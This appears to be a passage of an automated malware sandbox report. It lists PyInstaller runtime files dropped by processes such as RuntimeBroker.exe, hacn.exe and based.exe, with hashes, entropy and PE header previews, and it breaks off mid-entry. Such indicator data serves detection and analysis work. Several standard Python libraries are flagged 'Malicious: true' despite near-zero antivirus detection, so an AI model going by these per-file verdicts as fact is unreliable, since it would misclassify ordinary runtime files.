C:\Users\user\AppData\Local\Temp\_MEI68642\_socket.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	43800
Entropy (8bit):	7.716600949168409
Encrypted:	false
SSDEEP:	768:Qp4KUJsCditRTPL/f9hpDd1ciTceZS/VgpjrpILLwjm/5YiSyv6PxWEads:QpghditRDL/1rcOcT/V4rpILLwjmx7Sd
MD5:	49F87AEC74FEA76792972022F6715C4D
SHA1:	ED1402BB0C80B36956EC9BAF750B96C7593911BD
SHA-256:	5D8C8186DF42633679D6236C1FEBF93DB26405C1706F9B5D767FEAB440EA38B0
SHA-512:	DE58D69228395827547E07695F70EF98CDAF041EBAAE0C3686246209254F0336A589B58D44B7776CCAE24A5BC03B9DC8354C768170B1771855F342EECC5FEAD4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....p...........k....................................................`.............................................P.......h............ ..<...........X........................................w..8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc................n..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	880569
Entropy (8bit):	5.682993312079324
Encrypted:	false
SSDEEP:	12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
MD5:	C4989BCEB9E7E83078812C9532BAEEA7
SHA1:	AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
SHA-256:	A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
SHA-512:	FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
Malicious:	false
Reputation:	unknown
Preview:	PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI68642\libcrypto-1_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1112856
Entropy (8bit):	7.937513332106868
Encrypted:	false
SSDEEP:	24576:AfVpBeOErQiWG03fz7UuJ7G/y1Pcg8rWgrnNFF+EoIFAVMBU1CPwDv3uFfJN:4pBejNWGoXFJ7ay14rWgrnNxoIFAy+1Y
MD5:	BBC1FCB5792F226C82E3E958948CB3C3
SHA1:	4D25857BCF0651D90725D4FB8DB03CCADA6540C3
SHA-256:	9A36E09F111687E6B450937BB9C8AEDE7C37D598B1CCCC1293EED2342D11CF47
SHA-512:	3137BE91F3393DF2D56A3255281DB7D4A4DCCD6850EEB4F0DF69D4C8DDA625B85D5634FCE49B195F3CC431E2245B8E9BA401BAAA08778A467639EE4C1CC23D8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..........&..n5...&...................................7...........`......................................... .5.......5.h.....5.......2...............7......................................z5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc.........5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI68642\python310.dll

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1514776
Entropy (8bit):	7.99244120733247
Encrypted:	true
SSDEEP:	24576:AqrG9EWpLjdwiANNmpsWKCixQvvkZVqezQv4ivFf1BiuY1Gb+Dyl3/lJYjhYPkm9:A9xdvANw3J72q016ie6Ds/lJYjhq/
MD5:	4A6AFA2200B1918C413D511C5A3C041C
SHA1:	39CA3C2B669ADAC07D4A5EB1B3B79256CFE0C3B3
SHA-256:	BEC187F608507B57CF0475971BA646B8AB42288AF8FDCF78BCE25F1D8C84B1DA
SHA-512:	DBFFB06FFFF0542200344EA9863A44A6F1E1B783379E53DF18580E697E8204D3911E091DEB32A9C94B5599CDD54301B705B74E1F51104151CF13B89D57280A20
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." ..... .......P/..jE..`/..................................`F...........`...........................................E.......E.d.....E......`B..............PF......................................vE.8...........................................UPX0.....P/.............................UPX1..... ...`/.....................@....rsrc.........E.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI68642\select.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.406438297877472
Encrypted:	false
SSDEEP:	384:7iRf5SV1a/KjrtZa7gJXEOBILQGe6vHQIYiSy1pCQ6wYPxh8E9VF0NyvrO:7GxSVQiVpUOBILQGek5YiSyvrYPxWEl6
MD5:	B6DE7C98E66BDE6ECFFBF0A1397A6B90
SHA1:	63823EF106E8FD9EA69AF01D8FE474230596C882
SHA-256:	84B2119ED6C33DFBDF29785292A529AABBF75139D163CFBCC99805623BB3863C
SHA-512:	1FC26E8EDC447D87A4213CB5DF5D18F990BBA80E5635E83193F2AE5368DD88A81FDDFB4575EF4475E9BF2A6D75C5C66C8ED772496FFA761C0D8644FCF40517CA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI68642\unicodedata.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	296728
Entropy (8bit):	7.985011478309557
Encrypted:	false
SSDEEP:	6144:UcNGPr86AeT4HbUO2GkYmuUuQG1a7kj04fuNPYn/VoR4:UcNGz86iHbUORk+D1a7kLWNwna4
MD5:	C697DC94BDF07A57D84C7C3AA96A2991
SHA1:	641106ACD3F51E6DB1D51AA2E4D4E79CF71DC1AB
SHA-256:	58605600FDAAFBC0052A4C1EB92F68005307554CF5AD04C226C320A1C14F789E
SHA-512:	4F735678B7E38C8E8B693593696F9483CF21F00AEA2A6027E908515AA047EC873578C5068354973786E9CFD0D25B7AB1DD6CBB1B97654F202CBB17E233247A61
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)\|.K(.eJ)..K(.eJ).eK).eJ)\|.G(.eJ)\|.J(.eJ)\|..).eJ)\|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....P...........V... ................................................`..........................................{..X....y.......p..........H............{.......................................b..8...........................................UPX0....................................UPX1.....P... ...F..................@....rsrc........p.......J..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI76842\VCRUNTIME140.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI76842\_bz2.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83736
Entropy (8bit):	6.595094797707322
Encrypted:	false
SSDEEP:	1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
MD5:	86D1B2A9070CD7D52124126A357FF067
SHA1:	18E30446FE51CED706F62C3544A8C8FDC08DE503
SHA-256:	62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
SHA-512:	7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI76842\_decimal.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	254744
Entropy (8bit):	6.564308911485739
Encrypted:	false
SSDEEP:	6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
MD5:	20C77203DDF9FF2FF96D6D11DEA2EDCF
SHA1:	0D660B8D1161E72C993C6E2AB0292A409F6379A5
SHA-256:	9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
SHA-512:	2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....\|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......\|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...\|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI76842\_hashlib.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64792
Entropy (8bit):	6.223467179037751
Encrypted:	false
SSDEEP:	1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
MD5:	D4674750C732F0DB4C4DD6A83A9124FE
SHA1:	FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
SHA-256:	CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
SHA-512:	97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI76842\_lzma.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	158488
Entropy (8bit):	6.8491143497239655
Encrypted:	false
SSDEEP:	3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
MD5:	7447EFD8D71E8A1929BE0FAC722B42DC
SHA1:	6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
SHA-256:	60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
SHA-512:	C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI76842\_socket.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	79128
Entropy (8bit):	6.284790077237953
Encrypted:	false
SSDEEP:	1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
MD5:	819166054FEC07EFCD1062F13C2147EE
SHA1:	93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
SHA-256:	E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
SHA-512:	DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI76842\base_library.zip

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	880569
Entropy (8bit):	5.682993312079324
Encrypted:	false
SSDEEP:	12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
MD5:	C4989BCEB9E7E83078812C9532BAEEA7
SHA1:	AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
SHA-256:	A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
SHA-512:	FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
Malicious:	false
Reputation:	unknown
Preview:	PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI76842\libcrypto-1_1.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3450648
Entropy (8bit):	6.098075450035195
Encrypted:	false
SSDEEP:	98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
MD5:	9D7A0C99256C50AFD5B0560BA2548930
SHA1:	76BD9F13597A46F5283AA35C30B53C21976D0824
SHA-256:	9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
SHA-512:	CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.\|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...\|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI76842\python310.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4458776
Entropy (8bit):	6.460390021076921
Encrypted:	false
SSDEEP:	49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
MD5:	63A1FA9259A35EAEAC04174CECB90048
SHA1:	0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
SHA-256:	14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
SHA-512:	896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.\|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6361390
Entropy (8bit):	7.989449982411625
Encrypted:	false
SSDEEP:	196608:S8JwSNEMZM/LUuL/VLdu4IDrrp9ECJqIrE:S4jEMeIqd6DrrDLJNE
MD5:	E5DB23B3AAF4DDDD2BAF96FB7BBA9616
SHA1:	B4479AB38BB534CE5BBF9C6F3C89305BDCFF2CF7
SHA-256:	93BDF29408BE9CF5C1880F897F91CD475824E46B929CD947F32B8808A5903958
SHA-512:	541436C704D8789DAD962841B985EB84C251F5FAC7AD93DD318BC91A2C29885947F8D35AC99C03B3C3D6EC81D03AD25E01F85406F8F86BF05BD2D30244CE51DB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI76842\select.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29976
Entropy (8bit):	6.627859470728624
Encrypted:	false
SSDEEP:	768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
MD5:	A653F35D05D2F6DEBC5D34DADDD3DFA1
SHA1:	1A2CEEC28EA44388F412420425665C3781AF2435
SHA-256:	DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
SHA-512:	5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI76842\unicodedata.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1123608
Entropy (8bit):	5.3853088605790385
Encrypted:	false
SSDEEP:	12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
MD5:	81D62AD36CBDDB4E57A91018F3C0816E
SHA1:	FE4A4FC35DF240B50DB22B35824E4826059A807B
SHA-256:	1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
SHA-512:	7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)\|.K(.eJ)..K(.eJ).eK).eJ)\|.G(.eJ)\|.J(.eJ)\|..).eJ)\|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI77042\VCRUNTIME140.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI77042\_bz2.pyd

Download File

